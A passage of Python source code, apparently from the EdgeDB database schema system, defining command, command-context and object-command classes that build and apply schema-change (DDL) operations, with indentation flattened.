orig_op = op = self._get_simple_attribute_set_cmd(attr_name)
if op is None:
op = AlterObjectProperty(property=attr_name, new_value=value)
else:
op.new_value = value
if orig_inherited is None:
orig_inherited = inherited
op.new_inherited = inherited
op.old_inherited = orig_inherited
if orig_computed is None:
orig_computed = computed
op.new_computed = computed
op.old_computed = orig_computed
op.from_default = from_default
if source_context is not None:
op.source_context = source_context
if orig_value is not None:
op.old_value = orig_value
if orig_op is None:
self.add(op)
return op
def discard_attribute(self, attr_name: str) -> None:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
self.discard(op)
def __iter__(self) -> NoReturn:
raise TypeError(f'{type(self)} object is not iterable')
@overload
def get_subcommands(
self,
*,
type: Type[Command_T],
metaclass: Optional[Type[so.Object]] = None,
exclude: Union[Type[Command], Tuple[Type[Command], ...], None] = None,
include_prerequisites: bool = True,
) -> Tuple[Command_T, ...]:
...
@overload
def get_subcommands( # NoQA: F811
self,
*,
type: None = None,
metaclass: Optional[Type[so.Object]] = None,
exclude: Union[Type[Command], Tuple[Type[Command], ...], None] = None,
include_prerequisites: bool = True,
) -> Tuple[Command, ...]:
...
def get_subcommands( # NoQA: F811
self,
*,
type: Union[Type[Command_T], None] = None,
metaclass: Optional[Type[so.Object]] = None,
exclude: Union[Type[Command], Tuple[Type[Command], ...], None] = None,
include_prerequisites: bool = True,
) -> Tuple[Command, ...]:
ops: Iterable[Command]
if include_prerequisites:
ops = itertools.chain(self.before_ops, self.ops)
else:
ops = self.ops
filters = []
if type is not None:
t = type
filters.append(lambda i: isinstance(i, t))
if exclude is not None:
ex = exclude
filters.append(lambda i: not isinstance(i, ex))
if metaclass is not None:
mcls = metaclass
filters.append(
lambda i: (
isinstance(i, ObjectCommand)
and issubclass(i.get_schema_metaclass(), mcls)
)
)
if filters:
return tuple(filter(lambda i: all(f(i) for f in filters), ops))
else:
return tuple(ops)
@overload
def get_prerequisites(
self,
*,
type: Type[Command_T],
include_prerequisites: bool = True,
) -> Tuple[Command_T, ...]:
...
@overload
def get_prerequisites( # NoQA: F811
self,
*,
type: None = None,
) -> Tuple[Command, ...]:
...
def get_prerequisites( # NoQA: F811
self,
*,
type: Union[Type[Command_T], None] = None,
include_prerequisites: bool = True,
) -> Tuple[Command, ...]:
if type is not None:
t = type
return tuple(filter(lambda i: isinstance(i, t), self.before_ops))
else:
return tuple(self.before_ops)
def has_subcommands(self) -> bool:
return bool(self.ops) or bool(self.before_ops)
def get_nonattr_subcommand_count(self) -> int:
count = 0
attr_cmds = (AlterObjectProperty, AlterSpecialObjectField)
for op in self.ops:
if not isinstance(op, attr_cmds):
count += 1
for op in self.before_ops:
if not isinstance(op, attr_cmds):
count += 1
return count
def prepend_prerequisite(self, command: Command) -> None:
if isinstance(command, CommandGroup):
for op in reversed(command.get_subcommands()):
self.prepend_prerequisite(op)
else:
self.before_ops.insert(0, command)
def add_prerequisite(self, command: Command) -> None:
if isinstance(command, CommandGroup):
self.before_ops.extend(command.get_subcommands())
else:
self.before_ops.append(command)
def prepend(self, command: Command) -> None:
if isinstance(command, CommandGroup):
for op in reversed(command.get_subcommands()):
self.prepend(op)
else:
if isinstance(command, AlterObjectProperty):
self._attrs[command.property] = command
elif isinstance(command, AlterSpecialObjectField):
self._special_attrs[command._field] = command
self.ops.insert(0, command)
def add(self, command: Command) -> None:
if isinstance(command, CommandGroup):
self.update(command.get_subcommands())
else:
if isinstance(command, AlterObjectProperty):
self._attrs[command.property] = command
elif isinstance(command, AlterSpecialObjectField):
self._special_attrs[command._field] = command
self.ops.append(command)
def update(self, commands: Iterable[Command]) -> None: # type: ignore
for command in commands:
self.add(command)
def replace(self, existing: Command, new: Command) -> None: # type: ignore
i = self.ops.index(existing)
self.ops[i] = new
def replace_all(self, commands: Iterable[Command]) -> None:
self.ops.clear()
self._attrs.clear()
self._special_attrs.clear()
self.update(commands)
def discard(self, command: Command) -> None:
try:
self.ops.remove(command)
except ValueError:
pass
try:
self.before_ops.remove(command)
except ValueError:
pass
if isinstance(command, AlterObjectProperty):
self._attrs.pop(command.property)
elif isinstance(command, AlterSpecialObjectField):
self._special_attrs.pop(command._field)
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
return schema
def get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
context_class = type(self).get_context_class()
assert context_class is not None
with context(context_class(schema=schema, op=self)):
return self._get_ast(schema, context, parent_node=parent_node)
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
raise NotImplementedError
def _log_all_renames(self, context: CommandContext) -> None:
if isinstance(self, RenameObject):
context.early_renames[self.classname] = self.new_name
for subcmd in self.get_subcommands():
subcmd._log_all_renames(context)
@classmethod
def get_orig_expr_text(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
name: str,
) -> Optional[str]:
orig_text_expr = qlast.get_ddl_field_value(astnode, f'orig_{name}')
if orig_text_expr:
orig_text = qlcompiler.evaluate_ast_to_python_val(
orig_text_expr, schema=schema)
else:
orig_text = None
return orig_text # type: ignore
@classmethod
def command_for_ast_node(
cls,
astnode: qlast.DDLOperation,
schema: s_schema.Schema,
context: CommandContext,
) -> Type[Command]:
return cls
@classmethod
def _modaliases_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Dict[Optional[str], str]:
modaliases = {}
if isinstance(astnode, qlast.DDLCommand) and astnode.aliases:
for alias in astnode.aliases:
if isinstance(alias, qlast.ModuleAliasDecl):
modaliases[alias.alias] = alias.module
return modaliases
@classmethod
def localnames_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Set[str]:
localnames: Set[str] = set()
if isinstance(astnode, qlast.DDLCommand) and astnode.aliases:
for alias in astnode.aliases:
if isinstance(alias, qlast.AliasedExpr):
localnames.add(alias.alias)
return localnames
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
cmd = cls._cmd_from_ast(schema, astnode, context)
cmd.source_context = astnode.context
cmd.qlast = astnode
ctx = context.current()
if ctx is not None and type(ctx) is cls.get_context_class():
ctx.op = cmd
if astnode.commands:
for subastnode in astnode.commands:
subcmd = compile_ddl(schema, subastnode, context=context)
if subcmd is not None:
cmd.add(subcmd)
return cmd
@classmethod
def _cmd_from_ast(
cls: Type[Command_T],
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
return cls()
@classmethod
def as_markup(cls, self: Command, *, ctx: markup.Context) -> markup.Markup:
node = markup.elements.lang.TreeNode(name=str(self))
for dd in self.get_subcommands():
if isinstance(dd, AlterObjectProperty):
diff = markup.elements.doc.ValueDiff(
before=repr(dd.old_value), after=repr(dd.new_value))
if dd.new_inherited:
diff.comment = 'inherited'
elif dd.new_computed:
diff.comment = 'computed'
node.add_child(label=dd.property, node=diff)
else:
node.add_child(node=markup.serialize(dd, ctx=ctx))
return node
@classmethod
def get_context_class(
cls: Type[Command_T],
) -> Optional[Type[CommandContextToken[Command_T]]]:
return cls._context_class # type: ignore
@classmethod
def get_context_class_or_die(
cls: Type[Command_T],
) -> Type[CommandContextToken[Command_T]]:
ctxcls = cls.get_context_class()
if ctxcls is None:
raise RuntimeError(f'context class not defined for {cls}')
return ctxcls
def formatfields(
self,
formatter: str = 'str',
) -> Iterator[Tuple[str, str]]:
"""Return an iterator over fields formatted using `formatter`."""
for name, field in self.__class__._fields.items():
value = getattr(self, name)
default = field.default
formatter_obj = field.formatters.get(formatter)
if formatter_obj and value != default:
yield (name, formatter_obj(value))
class Nop(Command):
pass
# Similarly to _dummy_object, we use _dummy_command for places where
# the typing requires an object, but we don't have it just yet.
_dummy_command = Command()
CommandList = checked.CheckedList[Command]
class CommandGroup(Command):
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_subcommands():
schema = op.apply(schema, context)
return schema
class CommandContextToken(Generic[Command_T]):
original_schema: s_schema.Schema
op: Command_T
modaliases: Mapping[Optional[str], str]
localnames: AbstractSet[str]
inheritance_merge: Optional[bool]
inheritance_refdicts: Optional[AbstractSet[str]]
mark_derived: Optional[bool]
preserve_path_id: Optional[bool]
enable_recursion: Optional[bool]
transient_derivation: Optional[bool]
def __init__(
self,
schema: s_schema.Schema,
op: Command_T,
*,
modaliases: Optional[Mapping[Optional[str], str]] = None,
# localnames are the names defined locally via with block or
# as function parameters and should not be fully-qualified
localnames: AbstractSet[str] = frozenset(),
) -> None:
self.original_schema = schema
self.op = op
self.modaliases = modaliases if modaliases is not None else {}
self.localnames = localnames
self.inheritance_merge = None
self.inheritance_refdicts = None
self.mark_derived = None
self.preserve_path_id = None
self.enable_recursion = None
self.transient_derivation = None
class CommandContextWrapper(Generic[Command_T_co]):
def __init__(
self,
context: CommandContext,
token: CommandContextToken[Command_T_co],
) -> None:
self.context = context
self.token = token
def __enter__(self) -> CommandContextToken[Command_T_co]:
self.context.push(self.token) # type: ignore
return self.token
def __exit__(
self,
exc_type: Type[Exception],
exc_value: Exception,
traceback: Any,
) -> None:
self.context.pop()
class CommandContext:
def __init__(
self,
*,
schema: Optional[s_schema.Schema] = None,
modaliases: Optional[Mapping[Optional[str], str]] = None,
localnames: AbstractSet[str] = frozenset(),
declarative: bool = False,
stdmode: bool = False,
testmode: bool = False,
internal_schema_mode: bool = False,
disable_dep_verification: bool = False,
allow_dml_in_functions: bool = False,
descriptive_mode: bool = False,
schema_object_ids: Optional[
Mapping[Tuple[sn.Name, Optional[str]], uuid.UUID]
] = None,
backend_runtime_params: Optional[Any] = None,
compat_ver: Optional[verutils.Version] = None,
) -> None:
self.stack: List[CommandContextToken[Command]] = []
self._cache: Dict[Hashable, Any] = {}
self._values: Dict[Hashable, Any] = {}
self.declarative = declarative
self.schema = schema
self._modaliases = modaliases if modaliases is not None else {}
self._localnames = localnames
self.stdmode = stdmode
self.internal_schema_mode = internal_schema_mode
self.testmode = testmode
self.descriptive_mode = descriptive_mode
self.disable_dep_verification = disable_dep_verification
self.allow_dml_in_functions = allow_dml_in_functions
self.renames: Dict[sn.Name, sn.Name] = {}
self.early_renames: Dict[sn.Name, sn.Name] = {}
self.renamed_objs: Set[so.Object] = set()
self.change_log: Dict[Tuple[Type[so.Object], str], Set[so.Object]] = (
collections.defaultdict(set))
self.schema_object_ids = schema_object_ids
self.backend_runtime_params = backend_runtime_params
self.affected_finalization: Dict[
Command,
List[Tuple[Command, AlterObject[so.Object], List[str]]],
] = collections.defaultdict(list)
self.compat_ver = compat_ver
@property
def modaliases(self) -> Mapping[Optional[str], str]:
maps = [t.modaliases for t in reversed(self.stack)]
maps.append(self._modaliases)
return collections.ChainMap(*maps)
@property
def localnames(self) -> Set[str]:
ign: Set[str] = set()
for ctx in reversed(self.stack):
ign.update(ctx.localnames)
ign.update(self._localnames)
return ign
@property
def inheritance_merge(self) -> Optional[bool]:
for ctx in reversed(self.stack):
if ctx.inheritance_merge is not None:
return ctx.inheritance_merge
return None
@property
def mark_derived(self) -> Optional[bool]:
for ctx in reversed(self.stack):
if ctx.mark_derived is not None:
return ctx.mark_derived
return None
@property
def preserve_path_id(self) -> Optional[bool]:
for ctx in reversed(self.stack):
if ctx.preserve_path_id is not None:
return ctx.preserve_path_id
return None
@property
def inheritance_refdicts(self) -> Optional[AbstractSet[str]]:
for ctx in reversed(self.stack):
if ctx.inheritance_refdicts is not None:
return ctx.inheritance_refdicts
return None
@property
def enable_recursion(self) -> bool:
for ctx in reversed(self.stack):
if ctx.enable_recursion is not None:
return ctx.enable_recursion
return True
@property
def transient_derivation(self) -> bool:
for ctx in reversed(self.stack):
if ctx.transient_derivation is not None:
return ctx.transient_derivation
return False
@property
def canonical(self) -> bool:
return any(ctx.op.canonical for ctx in self.stack)
def in_deletion(self, offset: int = 0) -> bool:
"""Return True if any object is being deleted in this context.
:param offset:
The offset in the context stack to start looking at.
:returns:
True if any object is being deleted in this context starting
from *offset* in the stack.
"""
return any(isinstance(ctx.op, DeleteObject)
for ctx in self.stack[:-offset])
def is_deleting(self, obj: so.Object) -> bool:
"""Return True if *obj* is being deleted in this context.
:param obj:
The object in question.
:returns:
True if *obj* is being deleted in this context.
"""
return any(isinstance(ctx.op, DeleteObject)
and ctx.op.scls == obj for ctx in self.stack)
def push(self, token: CommandContextToken[Command]) -> None:
self.stack.append(token)
def pop(self) -> CommandContextToken[Command]:
return self.stack.pop()
def get_referrer_name(
self, referrer_ctx: CommandContextToken[ObjectCommand[so.Object]],
) -> sn.QualName:
referrer_name = referrer_ctx.op.classname
renamed = self.early_renames.get(referrer_name)
if renamed:
referrer_name = renamed
else:
renamed = self.renames.get(referrer_name)
if renamed:
referrer_name = renamed
assert isinstance(referrer_name, sn.QualName)
return referrer_name
def get(
self,
cls: Union[Type[Command], Type[CommandContextToken[Command]]],
) -> Optional[CommandContextToken[Command]]:
if issubclass(cls, Command):
ctxcls = cls.get_context_class()
assert ctxcls is not None
else:
ctxcls = cls
for item in reversed(self.stack):
if isinstance(item, ctxcls):
return item
return None
def get_ancestor(
self,
cls: Union[Type[Command], Type[CommandContextToken[Command]]],
op: Optional[Command] = None,
) -> Optional[CommandContextToken[Command]]:
if issubclass(cls, Command):
ctxcls = cls.get_context_class()
assert ctxcls is not None
else:
ctxcls = cls
if op is not None:
for item in list(reversed(self.stack)):
if isinstance(item, ctxcls) and item.op is not op:
return item
else:
for item in list(reversed(self.stack))[1:]:
if isinstance(item, ctxcls):
return item
return None
def top(self) -> CommandContextToken[Command]:
if self.stack:
return self.stack[0]
else:
raise KeyError('command context stack is empty')
def current(self) -> CommandContextToken[Command]:
if self.stack:
return self.stack[-1]
else:
raise KeyError('command context stack is empty')
def parent(self) -> Optional[CommandContextToken[Command]]:
if len(self.stack) > 1:
return self.stack[-2]
else:
return None
def copy(self) -> CommandContext:
ctx = CommandContext()
ctx.stack = self.stack[:]
return ctx
def at_top(self) -> CommandContext:
ctx = CommandContext()
ctx.stack = ctx.stack[:1]
return ctx
def cache_value(self, key: Hashable, value: Any) -> None:
self._cache[key] = value
def get_cached(self, key: Hashable) -> Any:
return self._cache.get(key)
def drop_cache(self, key: Hashable) -> None:
self._cache.pop(key, None)
def store_value(self, key: Hashable, value: Any) -> None:
self._values[key] = value
def get_value(self, key: Hashable) -> Any:
return self._values.get(key)
@contextlib.contextmanager
def suspend_dep_verification(self) -> Iterator[CommandContext]:
dep_ver = self.disable_dep_verification
self.disable_dep_verification = True
try:
yield self
finally:
self.disable_dep_verification = dep_ver
def __call__(
self,
token: CommandContextToken[Command_T],
) -> CommandContextWrapper[Command_T]:
return CommandContextWrapper(self, token)
def compat_ver_is_before(
self,
ver: Tuple[int, int, verutils.VersionStage, int],
) -> bool:
return self.compat_ver is not None and self.compat_ver < ver
class ContextStack:
def __init__(
self,
contexts: Iterable[CommandContextWrapper[Command]],
) -> None:
self._contexts = list(contexts)
def push(self, ctx: CommandContextWrapper[Command]) -> None:
self._contexts.append(ctx)
def pop(self) -> None:
self._contexts.pop()
@contextlib.contextmanager
def __call__(self) -> Generator[None, None, None]:
with contextlib.ExitStack() as stack:
for ctx in self._contexts:
stack.enter_context(ctx) # type: ignore
yield
class DeltaRootContext(CommandContextToken["DeltaRoot"]):
pass
class DeltaRoot(CommandGroup, context_class=DeltaRootContext):
def __init__(self, **kwargs: Any) -> None:
super().__init__(**kwargs)
self.new_types: Set[uuid.UUID] = set()
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
from . import modules
from . import types as s_types
context = context or CommandContext()
with context(DeltaRootContext(schema=schema, op=self)):
mods = []
for cmop in self.get_subcommands(type=modules.CreateModule):
schema = cmop.apply(schema, context)
mods.append(cmop.scls)
for amop in self.get_subcommands(type=modules.AlterModule):
schema = amop.apply(schema, context)
mods.append(amop.scls)
for objop in self.get_subcommands():
if not isinstance(objop, (modules.CreateModule,
modules.AlterModule,
s_types.DeleteCollectionType)):
schema = objop.apply(schema, context)
for cop in self.get_subcommands(type=s_types.DeleteCollectionType):
schema = cop.apply(schema, context)
return schema
class Query(Command):
"""A special delta command representing a non-DDL query.
These are found in migrations.
"""
astnode = qlast.Query
expr = struct.Field(s_expr.Expression)
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
return cls(
source_context=astnode.context,
expr=s_expr.Expression.from_ast(
astnode, # type: ignore
schema=schema,
modaliases=context.modaliases,
localnames=context.localnames,
),
)
@classmethod
def as_markup(cls, self: Command, *, ctx: markup.Context) -> markup.Markup:
node = super().as_markup(self, ctx=ctx)
assert isinstance(node, markup.elements.lang.TreeNode)
assert isinstance(self, Query)
qltext = self.expr.text
node.add_child(node=markup.elements.lang.MultilineString(str=qltext))
return node
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
schema = super().apply(schema, context)
if not self.expr.is_compiled():
self.expr = self.expr.compiled(
self.expr,
schema,
options=qlcompiler.CompilerOptions(
modaliases=context.modaliases,
)
)
return schema
_command_registry: Dict[
Tuple[str, Type[so.Object]],
Type[ObjectCommand[so.Object]]
] = {}
def get_object_command_class(
cmdtype: Type[Command_T],
schema_metaclass: Type[so.Object],
) -> Optional[Type[Command_T]]:
assert issubclass(cmdtype, ObjectCommand)
return _command_registry.get( # type: ignore
(cmdtype._delta_action, schema_metaclass),
)
def get_object_command_class_or_die(
cmdtype: Type[Command_T],
schema_metaclass: Type[so.Object],
) -> Type[Command_T]:
cmdcls = get_object_command_class(cmdtype, schema_metaclass)
if cmdcls is None:
raise TypeError(f'missing {cmdtype.__name__} implementation '
f'for {schema_metaclass.__name__}')
return cmdcls
ObjectCommand_T = TypeVar("ObjectCommand_T", bound='ObjectCommand[so.Object]')
class ObjectCommand(Command, Generic[so.Object_T]):
"""Base class for all Object-related commands."""
#: Full name of the object this command operates on.
classname = struct.Field(sn.Name)
#: An optional set of values neceessary to render the command in DDL.
ddl_identity = struct.Field(
dict, # type: ignore
default=None,
)
#: An optional dict of metadata annotations for this command.
annotations = struct.Field(
dict, # type: ignore
default=None,
)
#: Auxiliary object information that might be necessary to process
#: this command, derived from object fields.
aux_object_data = struct.Field(
dict, # type: ignore
default=None,
)
#: When this command is produced by a breakup of a larger command
#: subtree, *orig_cmd_type* would contain the type of the original
#: command.
orig_cmd_type = struct.Field(
CommandMeta,
default=None,
)
scls: so.Object_T
_delta_action: ClassVar[str]
_schema_metaclass: ClassVar[Optional[Type[so.Object_T]]] = None
astnode: ClassVar[Union[Type[qlast.DDLOperation],
List[Type[qlast.DDLOperation]]]]
def __init_subclass__(cls, *args: Any, **kwargs: Any) -> None:
# Check if the command subclass has been parametrized with
# a concrete schema object class, and if so, record the
# argument to be made available via get_schema_metaclass().
super().__init_subclass__(*args, **kwargs)
generic_bases = typing_inspect.get_generic_bases(cls)
mcls: Optional[Type[so.Object]] = None
for gb in generic_bases:
base_origin = typing_inspect.get_origin(gb)
# Find the <ObjectCommand>[Type] base, where ObjectCommand
# is any ObjectCommand subclass.
if (
base_origin is not None
and issubclass(base_origin, ObjectCommand)
):
args = typing_inspect.get_args(gb)
if len(args) != 1:
raise AssertionError(
'expected only one argument to ObjectCommand generic')
arg_0 = args[0]
if not typing_inspect.is_typevar(arg_0):
assert issubclass(arg_0, so.Object)
if not arg_0.is_abstract():
mcls = arg_0
break
if mcls is not None:
existing = getattr(cls, '_schema_metaclass', None)
if existing is not None and existing is not mcls:
raise TypeError(
f'cannot redefine schema class of {cls.__name__} to '
f'{mcls.__name__}: a superclass has already defined it as '
f'{existing.__name__}'
)
cls._schema_metaclass = mcls
# If this is a command adapter rather than the actual
# command, skip the command class registration.
if not cls.has_adaptee():
delta_action = getattr(cls, '_delta_action', None)
schema_metaclass = getattr(cls, '_schema_metaclass', None)
if schema_metaclass is not None and delta_action is not None:
key = delta_action, schema_metaclass
cmdcls = _command_registry.get(key)
if cmdcls is not None:
raise TypeError(
f'Action {cls._delta_action!r} for '
f'{schema_metaclass} is already claimed by {cmdcls}'
)
_command_registry[key] = cls # type: ignore
@classmethod
def _classname_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
context: CommandContext,
) -> sn.Name:
return sn.UnqualName(astnode.name.name)
@classmethod
def _cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> ObjectCommand[so.Object_T]:
assert isinstance(astnode, qlast.ObjectDDL), 'expected ObjectDDL'
classname = cls._classname_from_ast(schema, astnode, context)
return cls(classname=classname)
def is_data_safe(self) -> bool:
if self.get_schema_metaclass()._data_safe:
return True
else:
return all(
subcmd.is_data_safe()
for subcmd in self.get_subcommands()
)
def get_required_user_input(self) -> Dict[str, str]:
result: Dict[str, str] = self.get_annotation('required_input')
if result is None:
result = {}
for cmd in self.get_subcommands():
subresult = cmd.get_required_user_input()
if subresult:
result.update(subresult)
return result
def get_friendly_description(
self,
*,
parent_op: Optional[Command] = None,
schema: Optional[s_schema.Schema] = None,
object: Any = None,
object_desc: Optional[str] = None,
) -> str:
"""Return a friendly description of this command in imperative mood.
The result is used in error messages and other user-facing renderings
of the command.
"""
object_desc = self.get_friendly_object_name_for_description(
parent_op=parent_op,
schema=schema,
object=object,
object_desc=object_desc,
)
return f'{self.get_verb()} {object_desc}'
def get_user_prompt(
self,
*,
parent_op: Optional[Command] = None,
) -> Tuple[str, str]:
"""Return a human-friendly prompt describing this operation."""
# The prompt is determined by the *innermost* subcommand as
# long as all its parents have exactly one child. The tree
# traversal stops on fragments and CreateObject commands,
# since there is no point to prompt about the creation of
# object innards.
if (
not isinstance(self, AlterObjectFragment)
and (
not isinstance(self, CreateObject)
and (
self.orig_cmd_type is None
or not issubclass(
self.orig_cmd_type, CreateObject
)
)
)
):
from . import referencing as s_referencing
subcommands = self.get_subcommands(
type=ObjectCommand,
exclude=(AlterObjectProperty, s_referencing.AlterOwned),
)
if len(subcommands) == 1:
subcommand = subcommands[0]
if isinstance(subcommand, AlterObjectFragment):
return subcommand.get_user_prompt(parent_op=parent_op)
else:
return subcommand.get_user_prompt(parent_op=self)
desc = self.get_friendly_description(parent_op=parent_op)
prompt_text = f'did you {desc}?'
prompt_id = get_object_command_id(self)
assert prompt_id is not None
return prompt_id, prompt_text
def validate_object(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> None:
pass
@classmethod
def get_parent_op(
cls,
context: CommandContext,
) -> ObjectCommand[so.Object]:
parent = context.parent()
if parent is None:
raise AssertionError(f'{cls!r} has no parent context')
op = parent.op
assert isinstance(op, ObjectCommand)
return op
@classmethod
@functools.lru_cache()
def _get_special_handler(
cls,
field_name: str,
) -> Optional[Type[AlterSpecialObjectField[so.Object]]]:
if (
issubclass(cls, AlterObjectOrFragment)
and not issubclass(cls, AlterSpecialObjectField)
):
schema_cls = cls.get_schema_metaclass()
return get_special_field_alter_handler(field_name, schema_cls)
else:
return None
def set_attribute_value(
self,
attr_name: str,
value: Any,
*,
orig_value: Any = None,
inherited: bool = False,
orig_inherited: Optional[bool] = None,
computed: bool = False,
orig_computed: Optional[bool] = None,
from_default: bool = False,
source_context: Optional[parsing.ParserContext] = None,
) -> Command:
special = type(self)._get_special_handler(attr_name)
op = self._get_attribute_set_cmd(attr_name)
top_op: Optional[Command] = None
if orig_inherited is None:
orig_inherited = inherited
if orig_computed is None:
orig_computed = computed
if op is None:
op = AlterObjectProperty(
property=attr_name,
new_value=value,
old_value=orig_value,
new_inherited=inherited,
old_inherited=orig_inherited,
new_computed=computed,
old_computed=orig_computed,
from_default=from_default,
source_context=source_context,
)
top_op = self._special_attrs.get(attr_name)
if top_op is None and special is not None:
top_op = special(classname=self.classname)
self.add(top_op)
if top_op:
top_op.add(op)
else:
self.add(op)
top_op = op
return top_op
else:
op.new_value = value
op.new_inherited = inherited
op.old_inherited = orig_inherited
op.new_computed = computed
op.old_computed = orig_computed
op.from_default = from_default
if source_context is not None:
op.source_context = source_context
if orig_value is not None:
op.old_value = orig_value
return op
def _propagate_if_expr_refs(
self,
schema: s_schema.Schema,
context: CommandContext,
action: str,
fixer: Optional[
Callable[[s_schema.Schema, ObjectCommand[so.Object], str,
CommandContext, s_expr.Expression],
s_expr.Expression]
]=None,
metadata_only: bool=True,
) -> s_schema.Schema:
scls = self.scls
expr_refs = s_expr.get_expr_referrers(schema, scls)
if expr_refs:
try:
sorted_ref_objs = sort_by_cross_refs(schema, expr_refs.keys())
except topological.CycleError as e:
assert e.item is not None
assert e.path is not None
item_vn = e.item.get_verbosename(schema, with_parent=True)
if len(e.path):
# Recursion involving more than one schema object.
rec_vn = e.path[-1].get_verbosename(
schema, with_parent=True)
msg = (
f'definition dependency cycle between {rec_vn} '
f'and {item_vn}'
)
else:
# A single schema object with a recursive definition.
msg = f'{item_vn} is defined recursively'
raise errors.InvalidDefinitionError(msg) from e
ref_desc = []
for ref in sorted_ref_objs:
cmd_drop: Command
cmd_create: Command
fns = expr_refs[ref]
this_ref_desc = []
for fn in fns:
if fn == 'expr':
fdesc = 'expression'
else:
fdesc = f"{fn.replace('_', ' ')} expression"
vn = ref.get_verbosename(schema, with_parent=True)
this_ref_desc.append(f'{fdesc} of {vn}')
# Alter the affected entity to change the body to
# a dummy version (removing the dependency) and
# then reset the body to original expression.
delta_drop, cmd_drop, _ = ref.init_delta_branch(
schema, context, cmdtype=AlterObject)
delta_create, cmd_create, _ = ref.init_delta_branch(
schema, context, cmdtype=AlterObject)
# Mark it metadata_only so that if it actually gets
# applied, only the metadata is changed but not
# the real underlying schema.
if metadata_only:
cmd_drop.metadata_only = True
cmd_create.metadata_only = True
try:
# Compute a dummy value
dummy = cmd_create.get_dummy_expr_field_value(
schema,
context,
field=type(ref).get_field(fn),
value=ref.get_field_value(schema, fn)
)
except NotImplementedError:
ref_desc.extend(this_ref_desc)
else:
# We need to extract the command on whatever the
# enclosing object of our referrer is, since we
# need to put that in the context so that
# compile_expr_field calls in the fixer can find
# the subject.
obj_cmd = next(iter(delta_create.ops))
assert isinstance(obj_cmd, ObjectCommand)
obj = obj_cmd.get_object(schema, context)
for fn in fns:
# Do the switcheroos
value = ref.get_explicit_field_value(schema, fn, None)
if value is None:
continue
assert isinstance(value, s_expr.Expression)
# Strip the "compiled" out of the expression
value = s_expr.Expression.not_compiled(value)
if fixer:
with obj_cmd.new_context(schema, context, obj):
value = fixer(
schema, cmd_create, fn, context, value)
cmd_drop.set_attribute_value(fn, dummy)
cmd_create.set_attribute_value(fn, value)
context.affected_finalization[self].append(
(delta_create, cmd_create, this_ref_desc)
)
schema = delta_drop.apply(schema, context)
if ref_desc:
expr_s = (
'an expression' if len(ref_desc) == 1 else 'expressions')
ref_desc_s = "\n - " + "\n - ".join(ref_desc)
raise errors.SchemaDefinitionError(
f'cannot {action} because it is used in {expr_s}',
details=(
f'{scls.get_verbosename(schema)} is used in:'
f'{ref_desc_s}'
)
)
return schema
def _finalize_affected_refs(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
# There might be dependencies between the things we need to
# fix up (a computed property and a constraint on it, for
# example, requires us to fix up the computed property first),
# so sort by dependency order.
objs_to_cmds = {}
for delta, cmd, refdesc in context.affected_finalization.get(self, []):
objs_to_cmds[cmd.scls] = delta, cmd, refdesc
objs = sort_by_cross_refs(schema, objs_to_cmds.keys())
for obj in reversed(objs):
delta, cmd, refdesc = objs_to_cmds[obj]
try:
cmd.canonicalize_alter_from_external_ref(schema, context)
schema = delta.apply(schema, context)
if not context.canonical and delta:
# We need to force the attributes to be resolved so
# that expressions get compiled *now* under a schema
# where they are correct, and not later, when more
# renames may have broken them.
assert isinstance(cmd, ObjectCommand)
for key, value in cmd.get_resolved_attributes(
schema, context).items():
cmd.set_attribute_value(key, value)
self.add(delta)
except errors.QueryError as e:
desc = self.get_friendly_description(schema=schema)
raise errors.SchemaDefinitionError(
f'cannot {desc} because this affects'
f' {" and ".join(refdesc)}',
details=e.args[0],
) from e
return schema
def _get_computed_status_of_fields(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> Dict[str, bool]:
result = {}
mcls = self.get_schema_metaclass()
for op in self._enumerate_attribute_cmds():
field = mcls.get_field(op.property)
if not field.ephemeral:
result[op.property] = op.new_computed
return result
def _update_computed_fields(
self,
schema: s_schema.Schema,
context: CommandContext,
update: Mapping[str, bool],
) -> None:
cur_comp_fields = self.scls.get_computed_fields(schema)
comp_fields = set(cur_comp_fields)
for fn, computed in update.items():
if computed:
comp_fields.add(fn)
else:
comp_fields.discard(fn)
if cur_comp_fields != comp_fields:
if comp_fields:
self.set_attribute_value(
'computed_fields',
frozenset(comp_fields),
orig_value=cur_comp_fields if cur_comp_fields else None,
)
else:
self.set_attribute_value(
'computed_fields',
None,
orig_value=cur_comp_fields if cur_comp_fields else None,
)
def _append_subcmd_ast(
self,
schema: s_schema.Schema,
node: qlast.DDLOperation,
subcmd: Command,
context: CommandContext,
) -> None:
subnode = subcmd.get_ast(schema, context, parent_node=node)
if subnode is not None:
node.commands.append(subnode)
def _get_ast_node(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> Type[qlast.DDLOperation]:
# TODO: how to handle the following type: ignore?
# in this class, astnode is always a Type[DDLOperation],
# but the current design of constraints handles it as
# a List[Type[DDLOperation]]
return type(self).astnode # type: ignore
def _deparse_name(
self,
schema: s_schema.Schema,
context: CommandContext,
name: sn.Name,
) -> qlast.ObjectRef:
